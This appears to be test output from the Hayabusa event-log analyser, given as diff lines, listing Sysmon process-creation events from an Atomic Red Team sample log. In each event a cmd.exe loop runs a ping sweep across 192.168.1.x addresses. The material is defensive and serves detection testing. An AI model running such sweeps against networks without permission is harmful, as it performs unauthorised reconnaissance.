+2019-07-19 23:52:35.999 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.123 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 208 | PGUID: 747F3D96-D933-5D31-0000-0010B6B23500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:36.510 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.124 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2600 | PGUID: 747F3D96-D934-5D31-0000-0010A3B53500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:36.905 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.125 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2596 | PGUID: 747F3D96-D934-5D31-0000-00106ABE3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:37.449 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.126 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3356 | PGUID: 747F3D96-D935-5D31-0000-001056C13500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:37.947 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.127 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5004 | PGUID: 747F3D96-D935-5D31-0000-001042C43500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:38.514 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.128 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3964 | PGUID: 747F3D96-D936-5D31-0000-00102EC73500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:38.992 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.129 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6540 | PGUID: 747F3D96-D936-5D31-0000-001075CA3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:39.508 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.130 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4324 | PGUID: 747F3D96-D937-5D31-0000-001066CD3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:40.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.131 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3560 | PGUID: 747F3D96-D938-5D31-0000-001072D03500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:40.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.132 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5224 | PGUID: 747F3D96-D938-5D31-0000-00105ED33500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:40.960 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.133 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4380 | PGUID: 747F3D96-D938-5D31-0000-00101EDC3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:41.512 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.134 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1816 | PGUID: 747F3D96-D939-5D31-0000-001090E23500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:41.967 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.135 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3320 | PGUID: 747F3D96-D939-5D31-0000-001072EB3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:42.436 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.136 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4540 | PGUID: 747F3D96-D93A-5D31-0000-001073EE3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:42.881 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.137 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-D93A-5D31-0000-00105FF83500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:43.478 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.138 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1248 | PGUID: 747F3D96-D93B-5D31-0000-001085FB3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:43.951 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.139 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6740 | PGUID: 747F3D96-D93B-5D31-0000-001092FE3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:44.408 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.140 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4792 | PGUID: 747F3D96-D93C-5D31-0000-0010B5053600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:44.926 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.141 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5676 | PGUID: 747F3D96-D93C-5D31-0000-0010B1083600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:45.532 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.142 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5800 | PGUID: 747F3D96-D93D-5D31-0000-0010A20B3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:45.970 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.143 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7156 | PGUID: 747F3D96-D93D-5D31-0000-0010910E3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:46.405 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.144 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4172 | PGUID: 747F3D96-D93E-5D31-0000-00107E113600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:46.879 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.145 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D93E-5D31-0000-0010FC153600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:47.411 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.146 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 680 | PGUID: 747F3D96-D93F-5D31-0000-001041203600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:47.993 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.147 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D93F-5D31-0000-001061233600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:48.567 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.148 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D940-5D31-0000-00104E263600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:49.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.149 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2136 | PGUID: 747F3D96-D941-5D31-0000-00103C293600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:49.408 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.150 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 868 | PGUID: 747F3D96-D941-5D31-0000-0010282C3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:50.047 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.151 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5380 | PGUID: 747F3D96-D942-5D31-0000-0010142F3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:50.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.152 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3712 | PGUID: 747F3D96-D942-5D31-0000-001013323600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:51.038 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.153 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 640 | PGUID: 747F3D96-D943-5D31-0000-0010FF343600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:51.517 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.154 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1680 | PGUID: 747F3D96-D943-5D31-0000-0010EB373600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:52.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.155 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4532 | PGUID: 747F3D96-D944-5D31-0000-0010D73A3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:52.553 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.156 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D944-5D31-0000-00109E433600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:53.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.157 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D945-5D31-0000-0010A2463600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:53.555 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.158 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2168 | PGUID: 747F3D96-D945-5D31-0000-0010A2493600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:54.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.159 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1664 | PGUID: 747F3D96-D946-5D31-0000-0010904C3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:54.529 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.160 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D946-5D31-0000-00107C4F3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:54.999 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.161 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2780 | PGUID: 747F3D96-D946-5D31-0000-001068523600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:55.533 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.162 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4036 | PGUID: 747F3D96-D947-5D31-0000-001068553600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:56.017 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.163 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6332 | PGUID: 747F3D96-D948-5D31-0000-001054583600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:56.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.164 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4368 | PGUID: 747F3D96-D948-5D31-0000-0010405B3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:57.003 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.165 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5480 | PGUID: 747F3D96-D948-5D31-0000-00102C5E3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:57.544 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.166 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5316 | PGUID: 747F3D96-D949-5D31-0000-0010F3663600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:58.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.167 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1232 | PGUID: 747F3D96-D94A-5D31-0000-0010E8693600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
